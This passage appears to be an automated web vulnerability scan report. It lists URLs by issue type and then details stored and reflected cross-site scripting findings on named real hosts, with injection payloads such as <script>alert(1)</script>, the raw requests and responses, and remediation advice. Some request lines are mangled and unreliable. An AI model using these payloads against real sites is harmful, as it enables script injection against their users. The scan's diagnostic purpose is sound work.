15.45. http://widgetsplus.com/google_plus_widget.php
15.46. http://ws.amazon.com/widgets/q
15.47. http://www.altn.com/Products/MDaemon-Email-Server-Windows/
15.48. http://www.authsmtp.com/
15.49. http://www.drugstore.com/pharmacy/drugindex/rxsearch.asp
15.50. http://www.facebook.com/connect/connect.php
15.51. http://www.facebook.com/plugins/likebox.php
15.52. http://www.facebook.com/plugins/likebox.php
15.53. http://www.facebook.com/plugins/likebox.php
15.54. http://www.facebook.com/plugins/recommendations.php
15.55. http://www.godaddy.com/gdshop/site_search.asp
15.56. http://www.godaddy.com/offers/hot-deals2.aspx
15.57. http://www.godaddy.com/productadvisor/pastart.aspx
15.58. http://www.google.com/search
15.59. http://www.google.com/search
15.60. http://www.google.com/search
15.61. http://www.google.com/url
15.62. http://www.google.com/url
15.63. http://www.google.com/url
15.64. http://www.google.com/url
15.65. http://www.google.com/url
15.66. http://www.google.com/url
15.67. http://www.googleadservices.com/pagead/conversion/1036609180/
15.68. http://www.googleadservices.com/pagead/conversion/1038104282/
15.69. http://www.googleadservices.com/pagead/conversion/1071433059/
15.70. http://www.googleadservices.com/pagead/conversion/1072356810/
15.71. http://www.imailserver.com/windows-email-server/
15.72. http://www.jangosmtp.com/Free-Account.asp
15.73. https://www.jangosmtp.com/PasswordReset.asp
15.74. https://www.jangosmtp.com/login.asp
15.75. http://www.opera.com/
15.76. http://www.powermta.port25.com/smtp-server-software-2/
15.77. http://www.smtp.com/
15.78. http://www.smtp2go.net/index.php
15.79. http://www.socketlabs.com/lpages/od-smtp-service
15.80. http://www.stumbleupon.com/badge/embed/1/
15.81. http://www.ubm.com/en/site-services/search/search-result.aspx
15.82. http://www.youtube.com/embed/lIEF1xCAvxo
16. Cross-domain script include
16.1. http://fei-zyfer.com/
16.2. http://go.icontact.com/SEM/AP/free-30-day-trial-20J6-1725H4.html
16.3. http://googleads.g.doubleclick.net/pagead/ads
16.4. http://googleads.g.doubleclick.net/pagead/ads
16.5. https://idp.godaddy.com/login.aspx
16.6. https://idp.godaddy.com/retrieveaccount.aspx
16.7. https://idp.godaddy.com/shopper_new.aspx
16.8. http://labs.opera.com/
16.9. http://labs.opera.com/news/2011/03/22/
16.10. http://landing.sendgrid.com/smtp-with-bullet-points/
16.11. http://media.ubm.com/
16.12. http://media.ubm.com/news
16.13. http://my.opera.com/community/
16.14. https://my.opera.com/community/signup/
16.15. https://mya.godaddy.com/Default.aspx
16.16. https://mya.godaddy.com/myrenewals/myRenewals.aspx
16.17. http://portal.opera.com/
16.18. http://portal.opera.com/portal/tabs/
16.19. http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
16.20. http://powermta1.com/wp-content/plugins/cforms/styling/sidebar-layout.css
16.21. http://seg.sharethis.com/getSegment.php
16.22. http://sendgrid.com/features
16.23. http://sendgrid.com/pricing.html
16.24. https://sendgrid.com/user/signup/package/44
16.25. https://support.socketlabs.com/
16.26. https://support.socketlabs.com/index.php/Base/User/Login
16.27. https://support.socketlabs.com/index.php/Base/UserRegistration/Register
16.28. https://support.socketlabs.com/index.php/Base/UserRegistration/RegisterSubmit
16.29. http://t.tellapart.com/hif
16.30. http://thehackernews.com/
16.31. http://thehackernews.com/2011/09/godaddy-websites-compromised-with.html
16.32. http://ws.amazon.com/widgets/q
16.33. http://www.altn.com/Downloads/FreeEvaluation/
16.34. http://www.altn.com/Products/MDaemon-Email-Server-Windows/
16.35. http://www.blackbaud.com/
16.36. http://www.bookkeepers.com.au/
16.37. http://www.drugstore.com/
16.38. http://www.drugstore.com/pharmacy/drugindex/rxsearch.asp
16.39. http://www.facebook.com/connect/connect.php
16.40. http://www.facebook.com/plugins/likebox.php
16.41. http://www.godaddy.com/
16.42. http://www.godaddy.com/domains/search.aspx
16.43. http://www.godaddy.com/gdshop/site_search.asp
16.44. http://www.godaddy.com/offers/hot-deals2.aspx
16.45. http://www.godaddy.com/productadvisor/pastart.aspx
16.46. http://www.imailserver.com/products/
16.47. http://www.imailserver.com/products/imail-secure-server/
16.48. http://www.imailserver.com/resources/
16.49. http://www.imailserver.com/resources/find-a-reseller/
16.50. http://www.imailserver.com/resources/testimonials/
16.51. http://www.imailserver.com/support/
16.52. http://www.imailserver.com/windows-email-server/
16.53. http://www.jangosmtp.com/Free-Account.asp
16.54. http://www.jangosmtp.com/Pricing.asp
16.55. http://www.jangosmtp.com/default.asp
16.56. http://www.jangosmtp.com/login.asp
16.57. https://www.jangosmtp.com/PasswordReset.asp
16.58. https://www.jangosmtp.com/login.asp
16.59. http://www.opera.com/
16.60. http://www.opera.com/company/
16.61. http://www.port25.com/products/prod_eval.html
16.62. http://www.port25.com/products/prod_evalthanks.html
16.63. http://www.port25.com/products/prod_pmta4_features.html
16.64. http://www.powermta.port25.com/
16.65. http://www.powermta.port25.com/download-a-white-paper/
16.66. http://www.powermta.port25.com/smtp-server-software-2/
16.67. http://www.powermta.port25.com/wp-content/themes/powermta1/images/about-logo.gif
16.68. http://www.powermta.port25.com/wp-content/themes/powermta1/images/face-logo.gif
16.69. http://www.powermta.port25.com/wp-content/themes/powermta1/images/headerimg.jpg
16.70. http://www.powermta.port25.com/wp-content/themes/powermta1/images/in-logo.gif
16.71. http://www.powermta.port25.com/wp-content/themes/powermta1/images/phone-number.gif
16.72. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-footer-logo.png
16.73. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-logo.png
16.74. http://www.powermta.port25.com/wp-content/themes/powermta1/images/submit_btn.png
16.75. http://www.powermta.port25.com/wp-content/themes/powermta1/images/tag-line.jpg
16.76. http://www.powermta.port25.com/wp-content/themes/powermta1/images/twit-logo.gif
16.77. http://www.powermta.port25.com/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js
16.78. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js
16.79. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js
16.80. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js
16.81. http://www.powermta.port25.com/wp-content/themes/powermta1/scripts/rsv.js
16.82. http://www.powermta.port25.com/wp-content/themes/powermta1/style.css
16.83. http://www.smtp.com/
16.84. http://www.smtp.com/service-info
16.85. https://www.smtp.com/signup
16.86. http://www.socketlabs.com/lpages/od-smtp-service
16.87. http://www.stumbleupon.com/badge/embed/1/
16.88. http://www.thewhir.com/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites
16.89. http://www.ubm.com/
16.90. http://www.ubm.com/en/people/jobshop.aspx
16.91. http://www.ubm.com/en/people/ubm-people.aspx
16.92. http://www.ubm.com/en/site-services/search/search-result.aspx
16.93. http://www.ubm.com/en/stylesheets/.~/media/Images/U/United-Business-Media-Plc/Images/business-banner/cursors/cursor_arrow_left.cur
16.94. http://www.ubm.com/en/ubm-businesses.aspx
16.95. http://www.youtube.com/embed/lIEF1xCAvxo
17. File upload functionality
18. TRACE method is enabled
18.1. https://livechat.iadvize.com/
18.2. https://login.secureserver.net/
18.3. http://mailjet.com/
18.4. http://www.authsmtp.com/
19. Email addresses disclosed
19.1. http://bstats.adbrite.com/click/bstats.gif
19.2. http://bstats.adbrite.com/click/bstats.gif
19.3. http://help.securepaynet.net/javascripts/lib/controls.js
19.4. http://httpd.apache.org/
19.5. http://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js
19.6. https://idp.godaddy.com/login.aspx
19.7. https://idp.godaddy.com/retrieveaccount.aspx
19.8. https://idp.godaddy.com/shopper_new.aspx
19.9. http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
19.10. http://labs.opera.com/
19.11. http://livechat.iadvize.com/chat_init.js
19.12. https://login.secureserver.net/
19.13. http://media.ubm.com/
19.14. https://my.opera.com/community/signup/
19.15. https://mya.godaddy.com/Default.aspx
19.16. https://mya.godaddy.com/myrenewals/myRenewals.aspx
19.17. http://sendgrid.com/features
19.18. http://sendgrid.com/pricing.html
19.19. https://sendgrid.com/user/signup/package/44
19.20. http://shoprunner.force.com/content/JsContentElementsDRGS
19.21. https://support.socketlabs.com/
19.22. https://support.socketlabs.com/index.php/Core/Default/Compressor/js/jquery:jqueryplugins:jqueryui:colorpicker:coresc
19.23. http://thehackernews.com/feeds/posts/summary
19.24. http://w.sharethis.com/button/buttons.js
19.25. http://wms.assoc-amazon.com/js/nifty.js
19.26. http://www.altn.com/Training/
19.27. http://www.apache.org/
19.28. http://www.blackbaud.com/
19.29. http://www.bookkeepers.com.au/components/com_sobi2/includes/js/advajax.js
19.30. http://www.godaddy.com/
19.31. http://www.godaddy.com/domains/search.aspx
19.32. http://www.godaddy.com/gdshop/site_search.asp
19.33. http://www.godaddy.com/offers/hot-deals2.aspx
19.34. http://www.godaddy.com/productadvisor/pastart.aspx
19.35. http://www.google.com/search
19.36. http://www.imailserver.com/support/
19.37. http://www.port25.com/corporate/corp_contact.html
19.38. http://www.port25.com/products/prod_eval.html
19.39. http://www.powermta.port25.com/
19.40. http://www.powermta.port25.com/download-a-white-paper/
19.41. http://www.powermta.port25.com/smtp-server-software-2/
19.42. http://www.powermta.port25.com/wp-content/themes/powermta1/images/about-logo.gif
19.43. http://www.powermta.port25.com/wp-content/themes/powermta1/images/face-logo.gif
19.44. http://www.powermta.port25.com/wp-content/themes/powermta1/images/headerimg.jpg
19.45. http://www.powermta.port25.com/wp-content/themes/powermta1/images/in-logo.gif
19.46. http://www.powermta.port25.com/wp-content/themes/powermta1/images/phone-number.gif
19.47. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-footer-logo.png
19.48. http://www.powermta.port25.com/wp-content/themes/powermta1/images/powerMTA-logo.png
19.49. http://www.powermta.port25.com/wp-content/themes/powermta1/images/submit_btn.png
19.50. http://www.powermta.port25.com/wp-content/themes/powermta1/images/tag-line.jpg
19.51. http://www.powermta.port25.com/wp-content/themes/powermta1/images/twit-logo.gif
19.52. http://www.powermta.port25.com/wp-content/themes/powermta1/js/coda-slider.1.1.1.pack.js
19.53. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-1.2.1.pack.js
19.54. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing-compatibility.1.2.pack.js
19.55. http://www.powermta.port25.com/wp-content/themes/powermta1/js/jquery-easing.1.2.pack.js
19.56. http://www.powermta.port25.com/wp-content/themes/powermta1/scripts/rsv.js
19.57. http://www.powermta.port25.com/wp-content/themes/powermta1/style.css
19.58. http://www.smtp.com/
19.59. http://www.smtp.com/javascripts/jqModal.js
19.60. http://www.smtp.com/stylesheets/jqModal.css
19.61. https://www.smtp.com/javascripts/jqModal.js
19.62. https://www.smtp.com/stylesheets/jqModal.css
19.63. http://www.snapengage.com/snapengage-sendgrid.js
19.64. http://www.socketlabs.com/home/company
19.65. http://www.thewhir.com/common/ga_social_tracking.js
20. Private IP addresses disclosed
20.1. http://api.facebook.com/restserver.php
20.2. http://api.facebook.com/restserver.php
20.3. http://connect.facebook.net/en_US/all.js
20.4. http://dev.opera.com/articles/view/opera-mini-request-headers/
20.5. http://external.ak.fbcdn.net/fbml_static_get.php
20.6. http://external.ak.fbcdn.net/safe_image.php
20.7. http://external.ak.fbcdn.net/safe_image.php
20.8. http://external.ak.fbcdn.net/safe_image.php
20.9. http://external.ak.fbcdn.net/safe_image.php
20.10. http://external.ak.fbcdn.net/safe_image.php
20.11. http://external.ak.fbcdn.net/safe_image.php
20.12. http://external.ak.fbcdn.net/safe_image.php
20.13. http://external.ak.fbcdn.net/safe_image.php
20.14. http://external.ak.fbcdn.net/safe_image.php
20.15. http://static.ak.fbcdn.net/connect.php/js/FB.Share
20.16. http://static.ak.fbcdn.net/connect/xd_proxy.php
20.17. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js
20.18. http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/jSVhQVZmVYK.css
20.19. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/bSOHtKbCGYI.png
20.20. http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/OT9e0gZvbwr.js
20.21. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/oV2G4fzMmpF.css
20.22. http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/V2gsYdzZe8g.png
20.23. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/EXJI6u8Gt3X.js
20.24. http://www.facebook.com/connect/connect.php
20.25. http://www.facebook.com/plugins/like.php
20.26. http://www.facebook.com/plugins/like.php
20.27. http://www.facebook.com/plugins/like.php
20.28. http://www.facebook.com/plugins/like.php
20.29. http://www.facebook.com/plugins/like.php
20.30. http://www.facebook.com/plugins/like.php
20.31. http://www.facebook.com/plugins/like.php
20.32. http://www.facebook.com/plugins/like.php
20.33. http://www.facebook.com/plugins/like.php
20.34. http://www.facebook.com/plugins/like.php
20.35. http://www.facebook.com/plugins/likebox.php
20.36. http://www.facebook.com/plugins/likebox.php
20.37. http://www.facebook.com/plugins/likebox.php
20.38. http://www.facebook.com/plugins/recommendations.php
20.39. http://www.facebook.com/plugins/recommendations.php
20.40. http://www.google.com/sdch/sXoKgwNA.dct
21. Robots.txt file
21.1. http://467-kxi-123.mktoresp.com/webevents/visitWebPage
21.2. http://ad.yieldmanager.com/pixel
21.3. http://ads.bluelithium.com/pixel
21.4. https://fonts.googleapis.com/css
21.5. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072582907/
21.6. http://help.securepaynet.net/topic/168/article/5246
21.7. https://idp.godaddy.com/login.aspx
21.8. http://imagesak.securepaynet.net/assets/godaddy.ico
21.9. http://img.secureserver.net/image.aspx
21.10. http://l.addthiscdn.com/live/t00/250lo.gif
21.11. http://livechat.iadvize.com/chat_init.js
21.12. https://livechat.iadvize.com/chat_button.js
21.13. https://mya.godaddy.com/default.aspx
21.14. http://powermta1.com/wp-content/plugins/cforms/styling/sidebar-layout.css
21.15. http://safebrowsing-cache.google.com/safebrowsing/rd/ChVnb29nLWJhZGJpbi1kaWdlc3R2YXIQARj7ASCEAioG_AAAAP8BMgX7AAAAAQ
21.16. http://safebrowsing.clients.google.com/safebrowsing/downloads
21.17. http://static.ak.fbcdn.net/connect/xd_proxy.php
21.18. http://t3.gstatic.com/images
21.19. http://toolbarqueries.clients.google.com/tbproxy/af/query
21.20. http://widget.uservoice.com/dcache/widget/feedback-tab.png
21.21. http://www.authsmtp.com/
21.22. http://www.facebook.com/plugins/like.php
21.23. http://www.google-analytics.com/__utm.gif
21.24. http://www.google.com/search
21.25. http://www.googleadservices.com/pagead/aclk
21.26. http://www.imailserver.com/imail
21.27. http://www.linkedin.com/analytics/
21.28. http://www.socketlabs.com/lpages/od-smtp-service
22. Cacheable HTTPS response
22.1. https://dev.opera.com/login/
22.2. https://dev.opera.com/login/lost-password/
22.3. https://dev.opera.com/login/wronglogin.dml
22.4. https://idp.godaddy.com/keepalive.aspx
22.5. https://idp.godaddy.com/login.aspx
22.6. https://idp.godaddy.com/retrieveaccount.aspx
22.7. https://idp.godaddy.com/shopper_new.aspx
22.8. https://login.secureserver.net/images/favicon_pl.ico
22.9. https://mail.fei-zyfer.com:4443/auth.html
22.10. https://mail.fei-zyfer.com:4443/emptyView4.html
22.11. https://my.opera.com/community/signup/
22.12. https://portal.opera.com/accounts/login/
22.13. https://secure.authsmtp.com/signup/index.php
22.14. https://sendgrid.com/user/signup/package/44
22.15. https://support.socketlabs.com/
22.16. https://support.socketlabs.com/index.php/Base/User/Login
22.17. https://support.socketlabs.com/index.php/Base/UserRegistration/Register
22.18. https://support.socketlabs.com/index.php/Base/UserRegistration/RegisterSubmit
22.19. https://www.jangosmtp.com/PasswordReset.asp
22.20. https://www.jangosmtp.com/login.asp
22.21. https://www.smtp.com/signup
23. Multiple content types specified
24. HTML does not specify charset
24.1. http://amch.questionmarket.com/adscgen/st.php
24.2. http://cdn.apture.com/media/html/aptureLoadIframe.html
24.3. http://d3.zedo.com/jsc/d3/ff2.html
24.4. http://fei-zyfer.com/loading.gif
24.5. http://fei-zyfer.com/qmimages/cssalt1_arrow_down.gif
24.6. http://fei-zyfer.com/qmimages/cssalt1_arrow_right.gif
24.7. http://g-ecx.images-amazon.com/images/G/01/associates/widgets/20070822/US/html/preload_retail_asset._V152385065_.html
24.8. http://mediacdn.disqus.com/1316112938/build/system/def.html
24.9. http://mediacdn.disqus.com/1316112938/build/system/reply.html
24.10. http://mediacdn.disqus.com/1316112938/build/system/upload.html
24.11. http://now.eloqua.com/visitor/v200/svrGP.aspx
24.12. http://player.ooyala.com/info/primary/
24.13. http://rover.ebay.com/ar/1/711-53200-19255-108/1
24.14. https://support.socketlabs.com/rss/
24.15. http://t.tellapart.com/hif
24.16. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
24.17. http://www.godaddy.com/sso/keepalive.aspx
25. Content type incorrectly stated
25.1. http://amch.questionmarket.com/adscgen/st.php
25.2. http://cdn.apture.com/media/searchfilter.khtml.v41994028.js
25.3. http://event.adxpose.com/event.flow
25.4. http://l.apture.com/v3/
25.5. http://livechat.iadvize.com/rpc/referrer.php
25.6. https://login.secureserver.net/images/favicon_pl.ico
25.7. https://login.secureserver.net/images/login/login_mmail.jpg
25.8. http://media.ubm.com/images/webdriver/toolbar/print.gif
25.9. http://media.ubm.com/images/webdriver/toolbar/rss.gif
25.10. http://now.eloqua.com/visitor/v200/svrGP.aspx
25.11. http://player.ooyala.com/info/primary/
25.12. http://player.ooyala.com/sas/authorized
25.13. http://rover.ebay.com/ar/1/711-53200-19255-108/1
25.14. http://ws.amazon.com/widgets/q
25.15. http://www.amazon.com/gp/loader/jsonp
25.16. http://www.conversionruler.com/bin/tracker.php
25.17. http://www.drugstore.com/LookAheadSuggestions.aspx
25.18. http://www.godaddy.com/sso/keepalive.aspx
25.19. http://www.google.com/search
25.20. http://www.port25.com/favicon.ico
25.21. http://www.port25.com/includes/port25.css
25.22. http://www.snapengage.com/snapabug/ServiceGetConfig
25.23. http://www.socketlabs.com/highslide/graphics/zoomout.cur
25.24. http://www.stumbleupon.com/hostedbadge.php
25.25. http://www.zoomerang.com/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7
26. Content type is not specified
26.1. http://63.80.4.140/open/1
26.2. http://l.player.ooyala.com/verify
26.3. http://s6.apture.com/ping/
1. Cross-site scripting (stored)
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://livechat.iadvize.com
Path:
/chat_init.js
Issue detail
The value of the vuid cookie submitted to the URL /chat_init.js is copied into the HTML document as plain text between tags at the URL /chat_init.js. The payload 26902<script>alert(1)</script>e2b4dabe39a was submitted in the vuid cookie. This input was returned unmodified in a subsequent request for the URL /chat_init.js.
Issue background
Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
Request 1
GET /chat_init.js?sid=1821 HTTP/1.1/about-us.htm;q=0.3aeffd3c6b449e3ce04e736ab952c6226902<script>alert(1)</script>e2b4dabe39a ; 1821vvc=2; 1821_idz=5BpDOKWS%2FkTWJm9Ev43C3ZPykmP%2BjsF4UYhz2VCIbR5txUhC6T%2BKwcCy9hJI8FcKUpAluYKb7y06d1kbXbWzvBgMnamPiXsbv3txM1yX0mRiW%2BbVh%2BBgOShBexiJWk1C%2Fqg6%2FrIk%2FMsGsiO5jNlOTe7aqOeQ; 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A1%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316198661%2C%22navTime%22%3A1000%2C%22origin_site%22%3A%22%22%2C%22origin%22%3A%22direct%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%7D
Request 2
GET /chat_init.js?sid=1821 HTTP/1.1;q=0.3aeffd3c6b449e3ce04e736ab952c62; 1821vvc=1
Response 2
HTTP/1.1 200 OK/livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"aeffd3c6b449e3ce04e736ab952c6226902%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee2b4dabe39a; expires=Sun, 15-Sep-2013 18:44:51 GMT; path=/%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A1%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A17%2C%22connectionTime%22%3A1316198661%2C%22navTime%22%3A30000%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.mailjet.com%5C%2F%22%2C%22timeElapsed%22%3A0.5%7D; path=/.userAgent) && !(/Chrome/.test(navigator.userAgent))) {ByTagName( 'BODY' )[ 0 ];...[SNIP]... .com/saveuid.php?sid=1821&vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c6226902<script>alert(1)</script>e2b4dabe39a ';...[SNIP]...
2. Cross-site scripting (reflected)
previous
next
There are 180 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
2.1. http://a.collective-media.net/adj/ds.home/default [REST URL parameter 2]
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/ds.home/default
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34dac'-alert(1)-'805d0111dab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ds.home34dac'-alert(1)-'805d0111dab /default;cmn=wfm;ugc=0;!c=ds;sz=300x250;ux=2ee636e8-ffbb-4707-83f7-1e5c10da5819;;pos=top;u=ds;dcopt=ist;ptile=1;s=ds.home;z=default;ord=110916093024416? HTTP/1.1;q=0.7
Response
HTTP/1.1 200 OK.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"33a37397b8ee1b; domain=collective-media.net; path=/; expires=Sun, 16-Oct-2011 16:30:30 GMT'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/ds.home34dac'-alert(1)-'805d0111dab /default;cmn=wfm;ugc=0;!c=ds;sz=300x250;ux=2ee636e8-ffbb-4707-83f7-1e5c10da5819;pos=top;u=ds;dcopt=ist;ptile=1;s=ds.home;z=default;net=wfm;ord=110916093024416?;'+cmifr+'ord1=' +Math.floor(Math.random()...[SNIP]...
2.2. http://a.collective-media.net/adj/ds.home/default [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/ds.home/default
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77b5c'-alert(1)-'c1bc23b80c2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ds.home/default77b5c'-alert(1)-'c1bc23b80c2 ;cmn=wfm;ugc=0;!c=ds;sz=300x250;ux=2ee636e8-ffbb-4707-83f7-1e5c10da5819;;pos=top;u=ds;dcopt=ist;ptile=1;s=ds.home;z=default;ord=110916093024416? HTTP/1.1;q=0.7
Response
HTTP/1.1 200 OK.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"33a37397b8ee1b; domain=collective-media.net; path=/; expires=Sun, 16-Oct-2011 16:30:31 GMT'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/ds.home/default77b5c'-alert(1)-'c1bc23b80c2 ;cmn=wfm;ugc=0;!c=ds;sz=300x250;ux=2ee636e8-ffbb-4707-83f7-1e5c10da5819;pos=top;u=ds;dcopt=ist;ptile=1;s=ds.home;z=default;net=wfm;ord=110916093024416?;'+cmifr+'ord1=' +Math.floor(Math.random() * 10000...[SNIP]...
2.3. http://a.collective-media.net/adj/ds.home/default [cmn parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/ds.home/default
Issue detail
The value of the cmn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3899c'-alert(1)-'8f689636d48 was submitted in the cmn parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ds.home/default;cmn=wfm;ugc=0;!c=ds;sz=300x250;ux=2ee636e8-ffbb-4707-83f7-1e5c10da5819;;pos=top;u=ds;dcopt=ist;ptile=1;s=ds.home;z=default;ord=110916093024416?3899c'-alert(1)-'8f689636d48 HTTP/1.1;q=0.7
Response
HTTP/1.1 200 OK.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"33a37397b8ee1b; domain=collective-media.net; path=/; expires=Sun, 16-Oct-2011 16:30:30 GMT'ipt type="text/javascript" lang...[SNIP]... .net/cmadj/ds.home/default;cmn=wfm;ugc=0;!c=ds;sz=300x250;ux=2ee636e8-ffbb-4707-83f7-1e5c10da5819;pos=top;u=ds;dcopt=ist;ptile=1;s=ds.home;z=default;net=wfm;ord=110916093024416?3899c'-alert(1)-'8f689636d48 ;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
2.4. http://a.collective-media.net/adj/ds.home/default [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/ds.home/default
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ff71'-alert(1)-'ea28fe8c229 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ds.home/default;cmn=wfm;ugc=0;!c=ds;sz=300x250;ux=2ee636e8-ffbb-4707-83f7-1e5c10da5819;;pos=top;u=ds;dcopt=ist;ptile=1;s=ds.home;z=default;ord=110916093024416?&3ff71'-alert(1)-'ea28fe8c229 =1 HTTP/1.1;q=0.7
Response
HTTP/1.1 200 OK.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"33a37397b8ee1b; domain=collective-media.net; path=/; expires=Sun, 16-Oct-2011 16:30:30 GMT'ipt type="text/javascript" lang...[SNIP]... .net/cmadj/ds.home/default;cmn=wfm;ugc=0;!c=ds;sz=300x250;ux=2ee636e8-ffbb-4707-83f7-1e5c10da5819;pos=top;u=ds;dcopt=ist;ptile=1;s=ds.home;z=default;net=wfm;ord=110916093024416?&3ff71'-alert(1)-'ea28fe8c229 =1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">...[SNIP]...
2.5. http://a.collective-media.net/cmadj/ds.home/default [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/cmadj/ds.home/default
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3e20'-alert(1)-'8c1518f6d09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadjb3e20'-alert(1)-'8c1518f6d09 /ds.home/default;cmn=wfm;ugc=0;!c=ds;sz=300x250;ux=2ee636e8-ffbb-4707-83f7-1e5c10da5819;pos=top;u=ds;dcopt=ist;ptile=1;s=ds.home;z=default;net=wfm;ord=110916093024416?;ord1=216411;cmpgurl=http%253A//www.drugstore.com/? HTTP/1.1;q=0.7
Response
